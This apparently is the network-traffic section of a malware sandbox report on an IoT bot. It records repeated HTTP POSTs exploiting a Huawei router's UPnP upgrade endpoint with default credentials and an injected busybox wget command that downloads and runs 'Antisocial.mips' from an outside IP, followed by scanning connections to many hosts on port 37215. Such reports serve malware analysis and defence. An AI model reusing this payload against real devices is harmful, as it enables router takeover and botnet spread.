                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 38 37 2e 34 32 2e 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.87.42.3 -l /tmp/binary -r /Anti_Bins/Antisocial.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                Source: global trafficTCP traffic: 192.168.2.23:34248 -> 194.87.42.3:5555
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.179.42.156:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.139.180.158:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.18.118.166:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.116.138.158:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.13.24.183:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.202.21.252:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.200.194.179:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.178.205.50:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.107.202.16:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.52.141.21:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.53.228.229:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.81.209.219:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.136.103.184:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.250.221.159:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.164.205.123:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.24.239.253:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.136.90.12:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.45.149.114:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.24.214.36:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.239.168.103:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.68.99.191:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.233.1.158:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.123.97.12:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.133.186.249:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.160.29.187:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.16.254.98:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.249.15.212:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.246.218.197:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.217.227.8:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.83.41.45:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.59.125.254:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.123.69.123:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.159.140.18:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 41.195.131.255:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.168.8.196:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.82.142.161:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.38.25.138:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.223.218.126:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.255.246.133:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 197.200.146.152:37215
                Source: global trafficTCP traffic: 192.168.2.23:4504 -> 156.237.224.191:37215
